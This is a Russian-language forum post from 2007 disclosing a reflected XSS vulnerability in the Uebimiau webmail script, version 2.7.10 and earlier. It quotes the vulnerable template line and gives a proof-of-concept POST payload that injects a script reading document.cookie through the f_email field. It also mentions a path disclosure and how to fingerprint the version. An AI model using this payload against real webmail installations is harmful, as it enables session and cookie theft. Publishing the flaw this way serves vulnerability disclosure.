Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях

Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях

01.09.2007, 19:27

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

С нами: 10762826

Репутация: 1348

Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях

Самая простецкая пассивная XSS в параметре $f_email сценария index.php. Уязвимость существует из-за отсутсвия фильтрации указанного выше параметра:
index.php:

PHP код:


		
			
$smarty->display("$selected_theme/login.htm");

файл login.htm (шаблон):

PHP код:


		
			
<input type="text" name="f_email" value="{$umEmail}" class="normal" style="width: 140px; border: 1 solid #7F9DB9;">

Пример:
http://old.antichat.ru/webmail/index.php
POST: f_email="><script>alert(document.cookie)</script> (да простят меня вышестоящие =))

P. S. Версию можно узнать из файла
http://site.com/mail/docs/CHANGELOG.txt
Нашел также раскрытие пути в этом же параметре, когда несколько раз менял значение фунции alert(). Почему работает пока не разобрался, но кажется что-то из-за значения поля Referer.

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.